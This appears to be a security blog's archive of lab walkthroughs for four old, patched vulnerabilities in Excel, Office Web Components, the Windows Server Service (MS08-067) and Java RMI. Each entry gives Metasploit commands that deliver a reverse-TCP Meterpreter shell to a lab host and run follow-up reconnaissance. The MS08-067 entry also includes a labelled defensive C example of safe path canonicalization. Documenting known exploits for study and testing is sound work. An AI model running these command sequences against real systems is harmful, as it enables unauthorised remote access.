Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

MS09-067 : Microsoft Excel Malformed FEATHEADER Record Vulnerability

Timeline :

Vulnerability reported to Microsoft by ZDI on 2009-10-20
Microsoft patch “KB973475” provided on 2009-11-10
Metasploit PoC provided by hdm on 2010-02-12
Exploit-DB PoC provided by anonymous on 2010-08-21

PoC provided by :

Sean Larsson
jduck

Reference(s) :

CVE-2009-3129
MS09-067

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
2007 Microsoft Office System SP1 & SP2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer SP1 & SP2
Microsoft Office Excel Viewer 2003 SP3

Tested on Windows XP SP3 with :

Office Excel 2003 SP3 before KB973475

Description :

This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker-supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code execution. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.

Commands :

use exploit/windows/fileformat/ms09_067_excel_featheader
set OUTPUTPATH /home/eromang
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

MS09-043 : Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption

Timeline :

Vulnerability reported to Microsoft by ZDI on 2007-03-19
Metasploit PoC provided by hdm on 2009-07-13
Milw0rm PoC provided by anonymous on 2009-07-16
Microsoft patch “KB947319” provided on 2009-08-11

PoC provided by :

unknown
hdm
Ahmed Obied
DSR

Reference(s) :

CVE-2009-1136
MS09-043

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2000 Web Components SP3
Microsoft Office XP Web Components SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2003 Web Components SP1 for the 2007 Microsoft Office System
Microsoft Internet Security and Acceleration Server 2004 Standard Edition SP3
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition SP3
Microsoft Internet Security and Acceleration Server 2006 Standard Edition SP1
Microsoft Internet Security and Acceleration Server 2006 Enterprise Edition SP1
Microsoft BizTalk Server 2002
Microsoft Visual Studio .NET 2003 SP1
Microsoft Office Small Business Accounting 2006

Tested on Windows XP SP3 with :

Office 2003 SP3 before KB947319

Description :

This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild.

Commands :

use exploit/windows/browser/ms09_043_owc_msdso
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS08-067 : Microsoft Server Service Relative Path Stack Corruption

Timeline :

Milw0rm PoC provided by Stephen Lawler on 2008-10-23
Metasploit PoC provided by hdm on 2009-10-28
Microsoft patch “KB958644” provided on 2008-10-23

PoC provided by :

Brett Moore
hdm

Reference(s) :

CVE-2008-4250
MS08-067

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 & SP3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP1 & SP2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition SP2
Windows Vista and Windows Vista SP1
Windows Vista x64 Edition and Windows Vista x64 Edition SP1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems

Tested on Windows XP SP3 before KB958644

Description :

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module; full support for NX bypass on 2003, along with other platforms, is still in development.
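As an added illustration of the bug class (not code from this post, from Metasploit or from NetAPI32.dll), here is a bounds-checked canonicalizer for backslash-separated absolute paths: it collapses "." and ".." components and rejects any ".." that would walk above the root, which is the check a canonicalizer processing untrusted relative paths must make instead of stepping backwards past the start of its buffer.

```c
#include <string.h>

/* Bounds-checked canonicalizer for backslash-separated absolute paths
 * (added illustration of the bug class, NOT the NetAPI32.dll code).
 * Collapses "." and ".." components and rejects any ".." that would
 * walk above the root. Returns 0 on success, -1 on rejection. */
int canonicalize_path(const char *in, char *out, size_t outsz)
{
    size_t o = 0;                       /* write position in out */
    const char *p = in;

    if (outsz < 2 || *p != '\\')
        return -1;                      /* need an absolute path and room for "\\" + NUL */
    out[o++] = '\\';
    p++;

    while (*p) {
        const char *start = p;          /* isolate the next component */
        while (*p && *p != '\\')
            p++;
        size_t len = (size_t)(p - start);
        while (*p == '\\')              /* swallow repeated separators */
            p++;

        if (len == 0 || (len == 1 && start[0] == '.'))
            continue;                   /* nothing to emit for "" or "." */

        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (o <= 1)
                return -1;              /* ".." at the root: refuse, never under-run out[] */
            o--;                        /* step back over the trailing '\\' ... */
            while (o > 0 && out[o - 1] != '\\')
                o--;                    /* ... and over the previous component */
            continue;
        }

        if (o + len + 1 > outsz)        /* component plus separator must fit */
            return -1;
        memcpy(out + o, start, len);
        o += len;
        out[o++] = '\\';
    }

    if (o > 1)                          /* drop trailing separator unless result is "\\" */
        o--;
    out[o] = '\0';
    return 0;
}
```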

Commands :

nmap 192.168.178.41
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0094 : Java RMIConnectionImpl Deserialization Privilege Escalation Exploit

Timeline :

Vulnerability reported to Oracle by ZDI on 2009-10-21
Coordinated public release of advisory on 2010-04-05
Metasploit PoC provided by hdm on 2010-09-08

PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

Reference(s) :

CVE-2010-0094
ZDI-10-051

Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

Tested on Windows XP SP3 with :

Java 6 Standard Edition Update 18

Description :

This module exploits a vulnerability in the Java Runtime Environment that allows a MarshalledObject containing a custom classloader to be deserialized under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

Commands :

use multi/browser/java_rmi_connection_impl
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig